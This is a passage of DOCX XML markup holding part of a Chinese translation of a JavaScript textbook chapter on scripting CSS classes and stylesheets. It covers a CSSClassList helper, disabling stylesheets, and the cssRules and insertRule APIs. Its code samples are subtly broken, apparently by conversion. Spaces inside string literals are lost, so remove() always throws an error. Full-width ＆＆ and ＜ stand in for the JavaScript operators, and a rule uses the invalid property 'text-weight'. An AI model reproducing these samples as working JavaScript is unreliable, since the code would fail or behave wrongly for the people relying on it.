        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return classes.search("\\b"+c+"\\b")!=-1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>不存在，将</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>添加到</w:t>
      </w:r>
      <w:r>
        <w:t>e.className</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CSSClassList.prototype.add=function(c){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.contains(c))return;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果存在，什么都不做</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var classes=this.e.className;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(classes</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>classes[classes.length-1]!="")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>c=""+c;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果需要加一个空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.e.className+=c;//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>添加到</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>将在</w:t>
      </w:r>
      <w:r>
        <w:t>e.className</w:t>
      </w:r>
      <w:r>
        <w:t>中出现的所有</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>都删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CSSClassList.prototype.remove=function(c){//</w:t>
      </w:r>
      <w:r>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>是否是合法的类名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(c.length===0||c.indexOf("")!=-1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("Invalid class name:</w:t>
      </w:r>
      <w:r>
        <w:t>'"+c+"'");//</w:t>
      </w:r>
      <w:r>
        <w:t>将所有作为单词的</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>和多余的尾随空格全部删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pattern=new RegExp("\\b"+c+"\\b\\s*","g");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.e.className=this.e.className.replace(pattern,"");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>不存在，将</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>添加到</w:t>
      </w:r>
      <w:r>
        <w:t>e.className</w:t>
      </w:r>
      <w:r>
        <w:t>中，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，将在</w:t>
      </w:r>
      <w:r>
        <w:t>e.className</w:t>
      </w:r>
      <w:r>
        <w:t>中出现的所有</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>都删除，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CSSClassList.prototype.toggle=function(c){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>(this.contains(c)){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>e.className</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.remove(c);//</w:t>
      </w:r>
      <w:r>
        <w:t>删除它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>否则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.add(c);//</w:t>
      </w:r>
      <w:r>
        <w:t>添加它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>e.className</w:t>
      </w:r>
      <w:r>
        <w:t>本身</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CSSClassList.prototype.toString=function(){return this.e.className;};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回在</w:t>
      </w:r>
      <w:r>
        <w:t>e.className</w:t>
      </w:r>
      <w:r>
        <w:t>中的类名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CSSClassList.prototype.toArr</w:t>
      </w:r>
      <w:r>
        <w:t>ay=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.e.className.match(/\b\w+\b/g)||[];</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18" w:name="16_6_Jiao_Ben_Hua_Yang_Shi_Biao_"/>
      <w:r>
        <w:t>16.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　脚本化样式表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="418"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>到目前为止，我们已经看到如何设置和查询</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式和单个元素的类名。脚本化样式表当然也是可能的。虽然不经常这么做，但偶尔这却非常有用，本节将概述该技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在脚本化样式表时，将会碰到两类需要使用的对象。第一类是元素对象，由＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素表示，两种元素包含或引用样式表。这些是常规的文档元素，如果它们有</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性值，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>document.getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来选择它们。第二类是</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它表示样式表本身。</w:t>
      </w:r>
      <w:r>
        <w:t>document.styleSheets</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个只读的类数组对象，它包含</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>对象，表示与文档关联在一起的样式表。如果为定义或引用了样式表的＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素设置</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>属性值，该</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>作为对应</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>属性就可用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以下几节阐述了利用这些样式、链接元素和样式表对象可以做些什么。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="16_6_1_Kai_Qi_He_Guan_Bi_Yang_Shi_Biao_"/>
      <w:r>
        <w:t>16.6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　开启和关闭样式表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最简单的脚本化样式表的技术也是最便捷和健壮的。＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素和</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>对象都定义了一个在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中可以设置和查询的</w:t>
      </w:r>
      <w:r>
        <w:t>disabled</w:t>
      </w:r>
      <w:r>
        <w:t>属性。顾名思义，如果</w:t>
      </w:r>
      <w:r>
        <w:t>disabled</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，样式表就被浏览器关闭并忽略。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:t>disableStylesheet()</w:t>
      </w:r>
      <w:r>
        <w:t>函数说明这一点。如果传递一个数</w:t>
      </w:r>
      <w:r>
        <w:t>字，函数将其当做</w:t>
      </w:r>
      <w:r>
        <w:t>document.styleSheets</w:t>
      </w:r>
      <w:r>
        <w:t>数组中的一个索引，如果</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>传递一个字符串，函数将其当做</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器并传递给</w:t>
      </w:r>
      <w:r>
        <w:t>document.querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>15.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节），然后设置所有返回元素的</w:t>
      </w:r>
      <w:r>
        <w:t>disabled</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function disableStylesheet(ss){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof ss==="number")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.styleSheets[ss].disabled=true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sheets=document.querySel</w:t>
      </w:r>
      <w:r>
        <w:t>ectorAll(ss);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>sheets.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sheets[i].disabled=true;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20" w:name="16_6_2_Cha_Xun___Cha_Ru_Yu_Shan_Chu_Yang"/>
      <w:r>
        <w:t>16.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　查询、插入与删除样式表规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="420"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了样式表的开启和关闭以外，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>对象也定义了用来查询、插入和删除样式表规则的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早版本实现的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>和其他浏览器实现的标准</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>之间有一些轻微的区别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>直接操作样式表通常没什么意义。典型地，相对编辑样式表或增加新规则而言，让样式表保持静态并对元素的</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性编程更好。</w:t>
      </w:r>
      <w:r>
        <w:t>另一方面，如果允许用户完全控制页面上的样式，可能就需要动态操作样式表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>document.styleSheets[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组的元素是</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>cssRules[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组，它包含样式表的所有规则：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var firstRule=document.styleSheets[0].cssRules[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>使用不同的属性名</w:t>
      </w:r>
      <w:r>
        <w:t>rules</w:t>
      </w:r>
      <w:r>
        <w:t>代替</w:t>
      </w:r>
      <w:r>
        <w:t>cssRules</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cssRules[]</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>rules[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组的元素为</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在标准</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>对象代表所有</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>规则，包含如</w:t>
      </w:r>
      <w:r>
        <w:t>@import</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>@page</w:t>
      </w:r>
      <w:r>
        <w:t>等指令。但是，在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>rules[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组只包含样式表中实际存在的样式规则。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>对象有两个属性可以很便捷地使用。（在标准</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中，非样式规则没有定义这些属性，当遍历样式表时希望能跳过去它。）</w:t>
      </w:r>
      <w:r>
        <w:t>selectText</w:t>
      </w:r>
      <w:r>
        <w:t>是规则的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器，它引用一个描述与选择器相关联的样式的可写</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象。回想一下，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDe</w:t>
      </w:r>
      <w:r>
        <w:t>claration</w:t>
      </w:r>
      <w:r>
        <w:t>是用来表示内联和计算样式的相同类型。可以利用它来查询规则的样式值或设置新样式。通常，当遍历样式表时，你对规则的文本比它解析后的表示形式更感兴趣。此时，使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>cssText</w:t>
      </w:r>
      <w:r>
        <w:t>属性来获得规则的文本表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>除了查询和修改样式表中已存在的规则以外，也能向样式表添加和从中删除规则。标准的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>接口定义了</w:t>
      </w:r>
      <w:r>
        <w:t>insertRule()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>deleteRule()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来添加和删除规则：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.styleSheets[0].insertRule("H1{text-weight:bold;}",0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:t>insertRule()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>deleteRule()</w:t>
      </w:r>
      <w:r>
        <w:t>，但定义了大致等效的函数</w:t>
      </w:r>
      <w:r>
        <w:t>addRule()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeRule()</w:t>
      </w:r>
      <w:r>
        <w:t>。（除了名字以外）仅有的不同是</w:t>
      </w:r>
      <w:r>
        <w:t>addRule()</w:t>
      </w:r>
      <w:r>
        <w:t>希望选择器文本和样式文本作为两个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以下代码遍历样式表的规则，举例说明了用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>对样式表进行一些可疑的修改：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ss=document.styleSheets[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>得到第一个样式表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>rules=ss.cssRules?ss.cssRules:ss.rules;//</w:t>
      </w:r>
      <w:r>
        <w:t>得到样式表规则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>rules.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历这些规则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var rule=rules[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!rule.selectorText)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过</w:t>
      </w:r>
      <w:r>
        <w:t>@import</w:t>
      </w:r>
      <w:r>
        <w:t>和非样式规则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var selector=rule.selectorText;//</w:t>
